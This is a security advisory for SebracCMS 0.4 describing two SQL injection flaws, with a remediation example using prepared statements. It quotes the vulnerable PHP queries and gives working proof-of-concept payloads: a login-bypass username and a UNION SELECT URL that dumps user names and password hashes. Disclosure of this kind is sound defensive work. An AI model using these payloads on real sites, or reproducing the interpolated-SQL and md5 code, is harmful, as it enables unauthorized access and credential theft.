SebracCMS <= 0.4 Multiple SQL Injection Vulnerabilities

2008.11.23
Credit: shinmai
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Name: SebracCMS
# Website: http://www.sebrac.netsons.org/cms/
# Vulnerability type: SQL Injection
# Author:
# shinmai, 2008-06-28
######################################################################################
# Description:
#
# SebracCMS contains two major SQL injection vulnerabilities:
# Unsanitized POST variables are interpolated into SQL queries when logging users in. This allows
# login access without proper credentials.
# And unsanitized GET variables are interpolated into SQL queries when loading articles. This allows
# an attacker to read all usernames and password hashes in the database.
#
# Vulnerable code in cms/index.php:

$n=$_POST['uname'];                 // taken from the request unescaped
$p= strtolower($_POST['upass']);
$cryp_p = md5($p);
//connect to db
include('incls/config.php');
// $n is spliced straight into the WHERE clause
$query="select * from sbc_user where uname='$n' and pw='$cryp_p'";

#
# POC
#
# using admin' OR '1'='1
# as the username will allow login without proper registered credentials
#
#
# The second and far more serious SQL injection is in cms/form/read.php
#
# This vulnerability allows an attacker to reveal all users and their md5 password hashes.
#
#
# Vulnerable code in cms/form/read.php:

$rec=($_GET['recid']);              // taken from the query string unescaped
*SNIP*
// $rec is spliced straight into the WHERE clause
$query="Select * from sbc_articles where idart= '$rec'" or die(mysql_error());

#
# POC
#
# using 1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
# as the GET variable 'recid' reveals the first post along with all registered users and their password hashes.
# Example: http://localhost/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
#
# There are some other SQLi vulnerabilities there, but these two are the most severe. I was going to include
# one more for changing any user's password, but I simply didn't have the time to start crafting very complex
# injections. Also, I have a sneaking suspicion there's an LFI vulnerability in the photo-gallery code in the CMS,
# but if there is one, I'll write up another advisory on that.
#
# As always, Good luck and be safe.
#
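As an added example (not part of the advisory and not SebracCMS code), the two queries above rewritten with PDO prepared statements, which is the fix for both issues: request data is bound as a parameter instead of being concatenated into the SQL string. The table and column names come from the advisory; the $pdo connection, its creation in incls/config.php and the function names are assumptions.

```php
<?php
// Added example, not SebracCMS code: the two queries from the advisory rewritten
// with PDO prepared statements so that request data is bound as parameters and
// never concatenated into SQL. Table and column names (sbc_user.uname, sbc_user.pw,
// sbc_articles.idart) come from the advisory; the $pdo connection (assumed to be
// created in incls/config.php) and the function names are assumptions.

// Replacement for the login query in cms/index.php. The row is fetched by user
// name alone, then the password is checked in PHP, so a crafted user name such as
// admin' OR '1'='1 is just a string that matches no row.
function login(PDO $pdo, string $uname, string $upass): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM sbc_user WHERE uname = :uname');
    $stmt->execute([':uname' => $uname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    // Rows migrated to password_hash() verify here; rows still holding the
    // legacy md5(strtolower($pass)) value fall through to a constant-time compare.
    if (password_verify($upass, (string) $row['pw'])) {
        return $row;
    }
    if (hash_equals((string) $row['pw'], md5(strtolower($upass)))) {
        // Legacy hash matched: upgrade it in place so the weak md5 disappears over time.
        $upd = $pdo->prepare('UPDATE sbc_user SET pw = :pw WHERE uname = :uname');
        $upd->execute([':pw' => password_hash($upass, PASSWORD_DEFAULT), ':uname' => $uname]);
        return $row;
    }
    return null;
}

// Replacement for the article query in cms/form/read.php. recid must be a
// positive integer and is bound as one, so a UNION payload is rejected before
// any SQL is built.
function readArticle(PDO $pdo, $recid): ?array
{
    $id = filter_var($recid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM sbc_articles WHERE idart = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

Because the query text is fixed at prepare time, the two POC strings from the advisory become ordinary parameter values; a web-server log entry carrying a quote or UNION in recid is still worth alerting on, but it no longer reaches the SQL parser.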

References:

http://www.securityfocus.com/bid/30003
http://www.milw0rm.com/exploits/5967


Copyright 2024, cxsecurity.com

 
